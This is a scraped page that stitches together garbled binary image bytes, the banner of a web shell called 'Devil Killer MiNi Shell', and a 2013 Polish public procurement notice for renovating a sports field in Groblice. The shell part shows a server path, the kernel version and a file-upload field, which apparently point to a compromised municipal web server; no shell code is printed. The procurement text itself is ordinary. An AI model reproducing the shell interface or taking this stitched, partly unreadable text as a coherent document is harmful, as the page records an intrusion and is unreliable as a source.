JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130724/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130724/291298-N-2013.html

<p class="kh_header"><b>Siechnice: Remont i modernizacja boiska sportowego w Groblicach
zlokalizowanego na działce 35/2 przy ul. Kolejowej</b><br>
<b>Numer ogłoszenia: 291298 - 2013; data zamieszczenia: 24.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Siechnic , ul. Jana Pawła II 12, 55-011 Siechnice, woj. dolnośląskie, tel. 71 391 91 01, faks 71 786 09 07.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.siechnice.gmina.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont i modernizacja boiska sportowego w Groblicach
zlokalizowanego na działce 35/2 przy ul. Kolejowej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest
remont i modernizacja boiska sportowego na działce rekreacyjnej nr 35/2 przy ul. Kolejowej w miejscowości
Groblice. Zakres robót obejmuje 2 dwa zadania: Zadanie 1 - rekultywacja nawierzchni boiska do piłki
nożnej w Groblicach, w szczególności: Na terenie działki objętej opracowaniem projektuje się wykonanie
prac rekultywacyjnych płyty boiska do piłki nożnej o wymiarach 60x30m i nawierzchni z trawy naturalnej.
Remontowane boisko posiadać będzie pasy bezpieczeństwa szerokości 1,38m za liniami bocznymi i 2,5 m
za liniami bramkowymi. Po ponownym wytyczeniu boiska projektuje się przeniesienie istniejącego
piłkochwytu za linię bramkową od strony drogi. Wzdłuż płyty boiska boiska, od strony
południowozachodniej, projektuje się ustawienie 10 ławek parkowych na stalagu z rur stalowych z
drewnianym siedziskiem bez oparcia, dodatkowo w ramach zadania 1 należy zamontować 5 ławek
parkowych na stelażu z rur stalowych z drewnianym siedziskiem z oparciem. Pozostała część działki
pozostanie bez zmian. W ramach inwestycji związanej z remontem i modernizacją boiska nie przewiduje
się wycinki drzew ani krzewów Zadanie 2 - wykonanie odwodnienia - drenaż francuski, w szczególności: wykonane zostanie odwodnienie boiska w postaci drenażu francuskiego, który ma za zadanie odebranie
wody z powierzchni boiska, aby nie dopuścić do zmiękczania murawy. Ze względu na brak możliwości
przyłączenia instalacji deszczowej do sieci lub innego odbiornika wód deszczowych, zaprojektowane rowy
drenarskie będą działać jak rowy chłonne. Szczegółowy zakres zamówienia określa dokumentacja
projektowa, opracowana przez arch. Kamilę Karłowską, stanowiąca załącznik nr 7 do specyfikacji istotnych
warunków zamówienia. Dokumentacja projektowa w wersji papierowej dostępna jest do wglądu w Urzędzie
Miejskim w Siechnicach pok.204, II piętro w godz. 8.00 - 14.00. Istnieje możliwość zamówienia kopii
dokumentacji projektowej (w ciągu 7 dni od złożenia zamówienia) lub możliwość udostępnienia
dokumentacji w celu wykonania kopii we własnym zakresie. Dokumentację do skopiowania wypożycza się
w godz. 15.00 - 15.30. Jej zwrot następuje następnego dnia do godz. 9.00 Dla prawidłowego oszacowania
kosztów inwestycji przez Wykonawcę - jako dokument pomocniczy, Zamawiający załącza przedmiary
robót. Przedmiar ten stanowi jedynie informację o charakterze pomocniczym, który wykonawca może
wykorzystać wraz z informacjami zawartymi w dokumentacji technicznej do opracowania własnego
przedmiaru. Przedmiar wykonawcy będzie podstawą do ustalania nakładów rzeczowych niezbędnych do
wykonania robót stanowiących przedmiot zamówienia oraz oszacowania ceny oferty. Zamawiający
zastrzega sobie prawo zmniejszenia lub zwiększenia zakresu zadania. Zmiany będą dotyczyły tylko
zakresu, który wyniknie w trakcie realizacji zadania, a będzie niezbędny do właściwego zakończenia
podstawowego zamówienia. Zamawiający nie dopuszcza składania ofert częściowych. Tam, gdzie w SIWZ
i dołączonych do niej załącznikach (np. rysunki, specyfikacje techniczne wykonania i odbioru robót
budowlanych, projekty, przedmiary) zostało wskazane pochodzenie (marka, znak towarowy, producent,
dostawca itp.) materiałów lub normy, aprobaty, specyfikacje i systemy, o których mowa w art. 30 ust. 1 - 3
ustawy Pzp, Zamawiający dopuszcza oferowanie materiałów lub rozwiązań równoważnych pod warunkiem,
że zapewnią uzyskanie parametrów technicznych nie gorszych od założonych w wyżej wymienionych
dokumentach.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupelniających w zakresie analogicznym do przedmiotu
zamówienia</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.21-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 56.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli wykonawca wraz z ofertą złoży podpisane oświadczenia o
spełnieniu warunków w niniejszym postępowaniu zgodnie z wzorem zamieszczonym w
załączniku nr 3 do specyfikacji istotnych warunków zamówienia - Oświadczenie o spełnieniu
warunków udziału w postępowaniu. W przypadku składania oferty przez wykonawców
ubiegających się wspólnie o udzielenie zamówienia, wymagane oświadczenie musi być złożone
przez każdego wykonawcę.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli wykonawca wraz z ofertą złoży podpisany wykaz wykonanych
w okresie pięciu lat przed upływem terminu składania ofert - a jeżeli okres prowadzenia
działalności jest krótszy - w tym okresie, robót budowlanych. W wykazie wykonawca
zobowiązany jest do podania rodzaju, wartości, dat i miejsca wykonania wykazanych robót
budowlanych oraz załączy dowody dotyczące najważniejszych robót, określających, czy te
roboty zostały wykonane w sposób należyty, a także wskazujące, że zostały wykonane zgodnie z
zasadami sztuki budowlanej i prawidłowo ukończone. Wzór wykazu stanowi załącznik nr 8 do
specyfikacji istotnych warunków zamówienia (Wykaz wykonanych/wykonywanych w ciągu
ostatnich pięciu lat robót budowlanych). Dowodami, o których mowa powyżej są: 1)
poświadczenie lub 2)jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie
jest w stanie uzyskać stosownego poświadczenia, oświadczenie wykonawcy. W przypadku, gdy
zamawiający jest podmiotem na rzecz którego roboty budowlane wskazane w wykazie, o którym
mowa w pkt. 2, zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania
dowodów, o których mowa niniejszym punkcie lub 3)dokumenty potwierdzające należyte
wykonanie robót budowlanych zgodnie z zasadami sztuki budowlanej i ich prawidłowe
ukończenie, określone w § 1 ust. 1 pkt 2 rozporządzenia Prezesa Rady Ministrów z dnia 30
grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od
wykonawców oraz form, w jakich te dokumenty mogą być składane (Dz.U. nr 226, poz 1817).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia w tym zakresie żadnego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli wykonawca: 1)wykaże, że dysponuje lub będzie dysponować
w okresie przewidzianym na realizację zamówienia osobami, które będą uczestniczyć w
wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych,
doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu
wykonywanych przez nie czynności, w szczególności osobami posiadającymi uprawnienia w
rozumieniu ustawy Prawo budowlane z dnia 7 lipca 1994 roku (tekst jednolity Dz. U. z 2006 r., Nr
156, poz. 1118 z późn. zm.) oraz ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych
architektów, inżynierów budownictwa oraz urbanistów (Dz. U. z 2001 r. Nr 5 poz. 42 z późn. zm.)
lub odpowiadające im ważne uprawnienia budowlane w zakresie pełnionej funkcji które zostały
wydane na podstawie wcześniej obowiązujących przepisów, tj. osobą posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności drogowej lub konstrukcyjno-budowlanej lub architektonicznej lub melioracyjnej, posiadającą co najmniej 3 lata doświadczenia zawodowego jako kierownik robót w specjalności j.w., 2)wraz z
ofertą złoży podpisany wykaz osób, które będą uczestniczyć w realizacji zamówienia,
zawierający informację na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia
zgodnie z wymaganiami określonymi w pkt. 1, opracowany zgodnie z załączonym wzorem
stanowiącym załącznik nr 9 do specyfikacji istotnych warunków zamówienia - Wykaz personelu
odpowiedzialnego bezpośrednio za realizację zamówienia. 3)do oferty dołączy: a)informację o
podstawie do dysponowania osobą lub osobami, o których mowa w pkt. 1, b)zobowiązanie osoby
lub osób z uprawnieniami, że będą uczestniczyć w wykonywaniu zamówienia, jeżeli osoby te nie
stanowią zasobu własnego wykonawcy. c)oświadczenie, że osoby, które będą uczestniczyć w
wykonywaniu zamówienia posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek
ich posiadania. UWAGA: Najpóźniej w dniu podpisania umowy, Wykonawca którego oferta
została wybrana, będzie zobowiązany dostarczyć wszystkie niezbędne uprawnienia i aktualne
zaświadczenia o przynależności do izby inżynierów budownictwa, potrzebne do realizacji
zadania zgodnie z przepisami. Zamawiający odstąpi od podpisania Umowy, jeżeli Wykonawca
najpóźniej w dniu podpisania umowy, nie dostarczy wszystkich niezbędnych dokumentów,
potrzebnych do realizacji zadania zgodnie z przepisami. W przypadku składania oferty przez
wykonawców ubiegających się wspólnie o udzielenie zamówienia, wymagane informacje mogą
być złożone wspólnie lub oddzielnie przez wykonawców.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli wykonawca posiada ubezpieczenie prowadzonej działalności
gospodarczej w zakresie realizowanym w ramach niniejszej umowy, przez okres co najmniej od daty podpisania umowy do czasu odbioru końcowego. Na każde żądanie Zamawiającego
Wykonawca jest obowiązany okazać aktualną opłaconą polisę ubezpieczeniową lub inny
dokument potwierdzający posiadanie aktualnego ubezpieczenia. Ubezpieczenie musi
obejmować, co najmniej ubezpieczenie w pełnym zakresie od odpowiedzialności cywilnej w
związku z realizacją niniejszej umowy w wysokości, co najmniej wartości kontraktu. Zgodnie z
art.26 ust.2b ustawy Pzp, jeżeli Wykonawca w celu spełnienia warunku, o którym mowa powyżej,
polega na zasobach innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi
stosunków, zamawiający w celu oceny, czy wykonawca będzie dysponował wskazanymi
zasobami w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy
stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów,
żąda przedstawienia dowodu posiadania aktualnej opłaconej polisy ubezpieczeniowej lub innego
dokumentu potwierdzającego posiadanie aktualnego ubezpieczenia przez podmiot, z którego
zasobów wykonawca korzysta.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>W celu zweryfikowania rzetelności, kwalifikacji, efektywności i doświadczenia Wykonawca zobowiązany jest w wykazie, o którym mowa powyżej, wskazać minimum 1 zamówienia o charakterze i złożoności porównywalnej z przedmiotem zamówienia tj. realizacją płyty boiska do piłki nożnej z naturalną nawierzchnią trawiastą.

Wykonawca zobowiązany jest do wskazania w ww. wykazie usługi niewykonanych lub wykonanych nienależycie.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)oświadczenie o zapoznaniu się z terenem, zaakceptowaniu warunków przetargu oraz stawek i narzutów
do negocjacji wyceny robót dodatkowych i/lub uzupełniających - załącznik nr 5 do specyfikacji istotnych
warunków zamówienia. W przypadku składania oferty przez wykonawców ubiegających się wspólnie o
udzielenie zamówienia, wymagane oświadczenie musi być złożone przez każdego wykonawcę w zakresie
w jakim jego dotyczy. 2)Wykonawca, ubiegający się o niniejsze zamówienie, który polega na wiedzy i
doświadczeniu, potencjale technicznym lub zdolności ekonomicznej i finansowej innych podmiotów,
niezależnie od charakteru prawnego łączących go z nim stosunków, zgodnie z art. 26 ust. 2b PZP,
zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji
zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do
oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu
zamówienia oraz żąda złożenia dokumentów dotyczących: a)zakresu dostępnych wykonawcy zasobów
innego podmiotu, b)sposobu wykorzystania zasobów innego podmiotu przez wykonawcę przy realizacji
zamówienia, c)charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem, d)zakresu i okresu
udziału innego podmiotu przy wykonywaniu zamówienia. 3)jeżeli Wykonawca, wykazując spełnienie
warunków, o których mowa w art. 22 ust.1 ustawy Pzp, polega na zasobach innych podmiotów na
zasadach określonych w art. 26 ust. 2b Pzp, a podmioty te będą brały udział w realizacji zamówienia,
Zamawiający żąda od Wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentów
wymienionych w pkt 6.2 - 6.4 specyfikacji istotnych warunków zamówienia. 4)listę podmiotów należących
do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5, albo informację o tym, że Wykonawca
nie należy do grupy kapitałowej. 5)w przypadku oferty składanej przez Wykonawców wspólnie
ubiegających się o udzielenie zamówienia: a)oświadczenia wymienione w pkt. 6.1 i 6.2 specyfikacji
istotnych warunków zamówienia składane są przez wszystkich Wykonawców wspólnie ubiegających się o
udzielenie zamówienia. b)dokumenty wymienione w pkt 6.3 specyfikacji istotnych warunków zamówienia
składa każdy z Wykonawców. W przypadku prowadzenia działalności w formie spółki cywilnej i przedłożenia do oferty zaświadczenia o wpisie do ewidencji działalności gospodarczej należy do tego
dokumentu dołączyć umowę spółki. Warunek nie ma zastosowania w przypadku załączenia do oferty
aktualnego odpisu z właściwego rejestru, jeżeli ujawniono w nim wspólników spółki, jak i sposób
reprezentowania spółki (składania oświadczeń woli). c)dokumenty wymienione w pkt 6.3, 6.4, 6.5 i 6.6
specyfikacji istotnych warunków zamówienia muszą potwierdzać spełnienie warunków szczegółowych
łącznie przez Wykonawców składających wspólnie ofertę. 6)pełnomocnictwo dla podmiotów występujących
wspólnie (konsorcjum, spółka cywilna), jeżeli zaistnieje taka sytuacja, zgodnie z art. 23 ustawy Prawo
zamówień publicznych. W razie wyboru oferty podmiotów występujących wspólnie, Zamawiający zażąda
przed zawarciem umowy - stosownie do art. 23 ust. 4 - umowy regulującej współpracę tych podmiotów.
Oferta konsorcjum musi spełniać następujące wymagania - zawierać odrębne i niezależne dla każdego
uczestnika konsorcjum wszystkie dokumenty i oświadczenia wymienione powyżej, podpisana w taki
sposób, by zobowiązywała prawnie wszystkie strony - to znaczy podpisana przez przedstawiciela
konsorcjum, którego upoważnienie do złożenia oferty wynika z dołączonego pełnomocnictwa, udzielonego
przez upoważnionych przedstawicieli członków konsorcjum 7)pełnomocnictwo dla osoby podpisującej
ofertę i inne dokumenty w imieniu wykonawcy, jeżeli jest to osoba nie wykazana w rejestrze 8)
Zaakceptowane istotne postanowienia umowy - druk w załączeniu (Załącznik nr 6 do specyfikacji istotnych
warunków zamówienia - Istotne warunki umowy) 9) Wypełnionego druku oferty - zgodnie ze wzorem
stanowiącym załącznik nr 1 do SIWZ - wzór oferty. Cena zawarta w ofercie musi uwzględniać wszystkie
prace wynikające z dokumentacji i z wizji w terenie. 10) Oświadczenie, że zastosowane przez Wykonawcę
przy realizacji zadania materiały będą posiadały właściwości użytkowe wymagane przy tego typu robotach,
a także będą posiadały ważne atesty, aprobaty techniczne i deklaracje zgodności dopuszczające do
stosowania, które na każde żądanie Zamawiającego zostaną niezwłocznie dostarczone - załącznik 14 do
specyfikacji istotnych warunków zamówienia W przypadku składania oferty przez wykonawców
ubiegających się wspólnie o udzielenie zamówienia, wymagane oświadczenie musi być złożone przez
każdego wykonawcę w zakresie w jakim jego dotyczy. 11) Jeżeli wykonawca wskazując na spełnienie
warunków, o których mowa w pkt. 5.2 - 5.5 specyfikacji istotnych warunków zamówienia polega na
zasobach innych podmiotów zamawiający w celu oceny, czy wykonawca będzie dysponował wskazanymi
zasobami w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący
wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, żąda złożenia wraz z ofertą
zobowiązania zgodnie ze wzorem stanowiącym załączniki nr 10 i 11 do specyfikacji istotnych warunków
zamówienia.
10) Wykonawca zobowiązany jest wraz z ofertą złożyć oświadczenie, o tym, że w przypadku gdy
ubezpieczenie nie obejmuje całego okresu realizacji zamówienia, Wykonawca zobowiązuję się do
odnawiania aktualnie posiadanej polisy (innego dokumentu ubezpieczenia) na czas obejmujący
wykonanie przedmiotu zamówienia. Wzór oświadczenia stanowi załącznik nr 2 do specyfikacji
istotnych warunków zamówienia.;</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza nieistotne zmiany w umowie oraz inne zmiany postanowień zawartych w istotnych
postanowieniach umowy, które Zamawiający przewidział w ogłoszeniu lub specyfikacji istotnych warunków
zamówienia. 1. Zamawiający dopuszcza możliwość przerwania świadczenia prac nie z winy Wykonawcy,
których nie można było przewidzieć lub którym skutkom nie można było zapobiec, pomimo dołożenia przez
Wykonawcę najwyższej staranności (np.: klęska żywiołowa i inne). Zamawiający dopuszcza zmianę
terminu realizacji umowy w przypadku wystąpienia okoliczności niezależnych od Wykonawcy skutkujących
niemożliwością dotrzymania terminu określonego w Umowie, termin ten może ulec przedłużeniu, nie dłużej
jednak niż o czas trwania tych okoliczności. 2.Zamawiający dopuszcza możliwość zmiany sposobu
